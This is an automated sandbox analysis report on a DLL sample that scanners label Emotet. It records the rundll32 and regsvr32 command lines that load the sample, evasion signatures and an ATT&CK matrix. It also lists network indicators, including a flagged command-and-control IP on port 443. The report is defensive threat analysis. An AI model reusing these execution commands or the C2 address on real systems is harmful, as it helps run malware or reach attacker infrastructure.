                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedx
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQg
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscB
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll"
                        Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                        Source: classification engineClassification label: mal96.troj.evad.winDLL@20/5@0/27
                        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285BA54 Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                        Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                        Source: 5CUFfVMSaQ.dllStatic PE information: More than 133 > 100 exports found
                        Source: 5CUFfVMSaQ.dllStatic PE information: Image base 0x180000000 > 0x60000000
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 5CUFfVMSaQ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007CB0E push rsp; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007CEE0 push rsp; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007D180 push rsp; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002D2C9 push rdi; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007D420 push rsp; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018007D7C0 push rsp; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002D8FD push rdi; ret
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285B61A push ebp; retf
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285B540 push esi; iretd
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0285AE42 push ebp; iretd
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0291236C push esp; retf
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .00cfg
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .gehcont
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .gxfg
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .retplne
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: .voltbl
                        Source: 5CUFfVMSaQ.dllStatic PE information: section name: _RDATA
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll
                        Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\NCybOKcMqaEIN\jnEWIdoCfnPf.dllJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll:Zone.Identifier read attributes | delete
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exe TID: 4224Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6220Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4140Thread sleep time: -150000s >= -30000s
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Windows\System32\regsvr32.exeAPI coverage: 4.4 %
                        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800426C8 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800436B4 FindFirstFileExW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018004383C FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180043DBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_02930A20 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                        Source: svchost.exe, 0000000C.00000002.837269152.000001FFA505E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@Hyper-V RAW
                        Source: regsvr32.exe, 00000006.00000002.964477134.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502763451.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502855478.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.837250042.000001FFA504C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668175675.0000024E70AF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.667732408.0000024E70A70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 0000000E.00000002.964372851.0000027146A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                        Source: svchost.exe, 0000000C.00000002.836872058.000001FF9F829000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                        Source: svchost.exe, 0000000E.00000002.964447614.0000027146A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003A8BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800385E0 GetProcessHeap,
                        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                        Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPort
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018003A8BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003794 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003A24 SetUnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003A34 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 188.165.79.151 443
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                        Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180045B10 cpuid
                        Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004050 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.1130000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.25325750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.2810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.237550f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964724556.0000000001130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449599584.0000023755221000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.448824975.0000025325750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.964860380.0000000002911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 5CUFfVMSaQ.dll, type: SAMPLE
                        Source: Yara matchFile source: 2.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.180000000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.965051526.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation1
                        DLL Side-Loading
                        111
                        Process Injection
                        2
                        Masquerading
                        OS Credential Dumping1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        Exfiltration Over Other Network Medium11
                        Encrypted Channel
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        3
                        Virtualization/Sandbox Evasion
                        LSASS Memory41
                        Security Software Discovery
                        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                        Ingress Tool Transfer
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                        Process Injection
                        Security Account Manager3
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                        Non-Application Layer Protocol
                        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                        Deobfuscate/Decode Files or Information
                        NTDS2
                        Process Discovery
                        Distributed Component Object ModelInput CaptureScheduled Transfer12
                        Application Layer Protocol
                        SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Hidden Files and Directories
                        LSA Secrets1
                        Remote System Discovery
                        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common2
                        Obfuscated Files or Information
                        Cached Domain Credentials2
                        File and Directory Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Regsvr32
                        DCSync44
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                        Rundll32
                        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                        File Deletion
                        Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 671666 Sample: 5CUFfVMSaQ Startdate: 22/07/2022 Architecture: WINDOWS Score: 96 32 121.247.2.0 TCISLTataCommunicationsIN India 2->32 34 133.247.2.0 SCN-NETSHONANCABLENETWORKJP Japan 2->34 36 23 other IPs or domains 2->36 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 2->48 50 2 other signatures 2->50 8 loaddll64.exe 1 2->8         started        10 svchost.exe 9 1 2->10         started        13 svchost.exe 2->13         started        15 3 other processes 2->15 signatures3 process4 dnsIp5 17 regsvr32.exe 5 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 8->22         started        24 2 other processes 8->24 38 127.0.0.1 unknown unknown 10->38 process6 signatures7 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->42 26 regsvr32.exe 17->26         started        30 rundll32.exe 20->30         started        process8 dnsIp9 40 188.165.79.151, 443, 49772 OVHFR France 26->40 52 System process connects to network (likely due to code injection or exploit) 26->52 signatures10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        5CUFfVMSaQ.dll21%VirustotalBrowse
                        5CUFfVMSaQ.dll46%MetadefenderBrowse
                        5CUFfVMSaQ.dll81%ReversingLabsWin64.Trojan.Emotet
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                        http://crl.ver)0%Avira URL Cloudsafe
                        https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                        https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                        https://188.165.79.151/0%URL Reputationsafe
                        https://188.165.79.151/oA~0%Avira URL Cloudsafe
                        http://help.disneyplus.com.0%URL Reputationsafe
                        https://www.pango.co/privacy0%URL Reputationsafe
                        https://disneyplus.com/legal.0%URL Reputationsafe
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        https://188.165.79.151/true
                        • URL Reputation: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.ver)svchost.exe, 0000000C.00000002.837320264.000001FFA508B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.668398256.0000024E71500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.624494400.0000024E71506000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.647804814.0000024E7158E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646539654.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.646486184.0000024E71A18000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://188.165.79.151/oA~regsvr32.exe, 00000006.00000002.964412082.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502695787.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://help.disneyplus.com.svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://support.hotspotshield.com/svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.hotspotshield.com/terms/svchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.pango.co/privacysvchost.exe, 00000014.00000003.637666200.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637519972.0000024E71A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637725354.0000024E71A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637589847.0000024E71A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637475233.0000024E715A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637701522.0000024E715B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.637485712.0000024E715B7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://disneyplus.com/legal.svchost.exe, 00000014.00000003.641209465.0000024E715B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641248614.0000024E71595000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641270170.0000024E715A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.641297731.0000024E715C2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            121.247.2.0
                            unknownIndia
                            17908TCISLTataCommunicationsINtrue
                            188.165.79.151
                            unknownFrance
                            16276OVHFRtrue
                            120.247.2.0
                            unknownChina
                            56048CMNET-BEIJING-APChinaMobileCommunicaitonsCorporationCNtrue
                            4.4.0.0
                            unknownUnited States
                            3356LEVEL3UStrue
                            8.4.0.0
                            unknownUnited States
                            3356LEVEL3UStrue
                            232.3.0.0
                            unknownReserved
                            unknownunknowntrue
                            139.247.2.0
                            unknownUnited States
                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                            133.247.2.0
                            unknownJapan131918SCN-NETSHONANCABLENETWORKJPtrue
                            224.146.244.0
                            unknownReserved
                            unknownunknowntrue
                            160.156.244.0
                            unknownTunisia
                            37492ORANGE-TNtrue
                            108.194.0.0
                            unknownUnited States
                            7018ATT-INTERNET4UStrue
                            160.153.244.0
                            unknownUnited States
                            21501GODADDY-AMSDEtrue
                            145.247.2.0
                            unknownFinland
                            41701CAP-FIN-ASFItrue
                            40.4.0.0
                            unknownUnited States
                            4249LILLY-ASUStrue
                            20.4.0.0
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                            143.247.2.0
                            unknownUnited States
                            600OARNET-ASUStrue
                            160.154.244.0
                            unknownCote D'ivoire
                            29571ORANGE-COTE-IVOIRECItrue
                            141.247.2.0
                            unknownUnited States
                            40112OPPD-ASUStrue
                            36.4.0.0
                            unknownChina
                            4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                            4.1.0.0
                            unknownUnited States
                            3356LEVEL3UStrue
                            160.147.244.0
                            unknownUnited States
                            1503DNIC-AS-01503UStrue
                            224.150.244.0
                            unknownReserved
                            unknownunknowntrue
                            236.3.0.0
                            unknownReserved
                            unknownunknowntrue
                            24.4.0.0
                            unknownUnited States
                            7922COMCAST-7922UStrue
                            21.115.0.0
